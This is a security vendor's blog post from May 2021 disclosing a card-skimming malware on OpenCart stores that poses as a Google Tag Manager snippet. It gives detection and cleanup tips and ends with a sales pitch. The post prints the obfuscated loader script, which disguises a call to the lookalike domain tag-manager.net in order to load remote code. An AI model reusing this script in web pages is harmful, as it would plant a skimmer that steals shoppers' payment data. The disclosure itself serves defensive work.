911 Hack Removal

OpenCart Stores Targeted with GTM Malware, Steals CC Information

Published on: May 13, 2021

OpenCart Stores Targeted with GTM Malware, Steals CC Information

In an interesting find, our team has discovered an unusual credit card stealing malware in OpenCart websites that mimics Google Tag Manager scripts. 

The malware dubbed as ‘GTM malware’ hides as a fake Google tag manager file by the name – tag-manager.net, which can be found inside the Google Analytics field of an OpenCart admin panel.

The malicious script is as follows:

<!-- Google Tag Manager -->
<script>!function(e,t,a,n){e[n]=e[n]||[],e[n].push({"gtm.start":
(new Date).getTime(),event:"gtm.js"});var r=t.getElementsByTagName(a)[0],
g=t.createElement(a),o="dataLayer"!=n?"&utm_referer="+n:"",s="tags";g.async=!0,
g.src=("//googletagmanager.net/g"+s+"/"+a+"2?utm_content=&utm_source="+o)
.replace("googletag","tag-"),r.parentNode.insertBefore(g,r)
    }(window,document,"script",location.hostname);
</script>

Also read: Admin Password Compromised and Credit Card Details Sent to Hacker Email – OpenCart & Prestashop

What you can do?

If your customers have been complaining about credit card theft of late, it might be possible that your OpenCart store has been hacked with Credit Card (CC) malware.

This is what you should do in such a case:

  • Scan your website with a malware scanner to confirm the hack
  • Take a backup of your store
  • Check for foreign files and scripts. Especially look for the fake GTM file ‘tag-manager.net’.

For detailed steps, check our guide on How to fix OpenCart credit card hack.

Immediate malware cleanup by Astra Security

Dealing with a live business store can be complicated and you don’t want your wrong move to break your website. This is why a professional malware cleanup is the best resort in any dire security situation.

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Website Protection before it is too late.

At Astra, our qualified security professionals fix hundreds of hacked websites daily. With our Immediate malware cleanup, your OpenCart store will be fixed in under 6-8 hours. You also get a year-long subscription to Astra’s Security Suite with a 24*7 active Website Firewall, an on-demand Malware Scanner, and several other security features and tools. Check out other Astra features here.

Aakanchha Keshri

Aakanchha is a technical writer and a cybersecurity enthusiast. She is an avid reader, researcher, and an active contributor to our blog and the cybersecurity genre in general. To date, she has written over 200 blogs for more than 60 domains on topics ranging from technical to promotional. When she is not writing or researching she revels in a game or two of CS: GO.
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany